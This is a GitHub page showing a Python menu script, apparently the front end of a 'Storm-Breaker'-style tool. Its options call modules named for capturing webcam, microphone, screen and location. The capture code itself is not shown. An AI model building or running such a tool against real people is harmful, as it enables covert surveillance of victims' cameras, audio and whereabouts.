-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDoraemon.py
73 lines (52 loc) · 2.21 KB
/
Doraemon.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# Basic user interface header
print(r"""
/\
/ \ _ __ _ _ __ _ _ __
/ /\ \ | '__| | | |/ _` | '_ \
_ _ _ _ _ _ _ _ _ _ _ / ____ \| | | |_| | (_| | | | |_ _ _ _ _ _ _ _ _ _ _ _
(_|_|_|_|_|_|_|_|_|_|_)_/ \_\_| \__, |\__,_|_| |_(_|_|_|_|_|_|_|_|_|_|_|_)
__/ |
|___/ """)
print("\n****************************************************************")
print("\n* Copyright of ***Aryan***, 2022")
print("\n* https://www.whitedevil.com")
print("\n* https://www.aryan.com ")
print("\n****************************************************************")
from colorama import Fore
import os
import sys
from modules import banner
import requests
from modules import localhost
import platform
sysname = platform.uname()[0]
while True:
banner.banner()
banner.infolist0()
try:
input1 = input(Fore.RED+" ┌─["+Fore.LIGHTGREEN_EX+"STORM-BREAKER"+Fore.BLUE+"~"+Fore.WHITE+"@HOME"+Fore.RED+"""]
└──╼ """+Fore.WHITE+"$ ")
if input1 == "1":
localhost.webcham()
elif input1 == "2":
if sysname == "Windows":
banner.banner()
print("\n This feature only works on Linux distributions\n".title())
input(Fore.RED+" [!]"+Fore.GREEN+" Back To Menu (Press Enter...) ")
else:
localhost.micro()
elif input1 == "3":
banner.banner()
localhost.screen()
elif input1 == "4":
banner.banner()
localhost.location()
elif input1 == "5":
banner.banner()
banner.infolist1()
elif input1 == "6":
print("\n God Lock :) ")
sys.exit()
except KeyboardInterrupt:
print("")
sys.exit()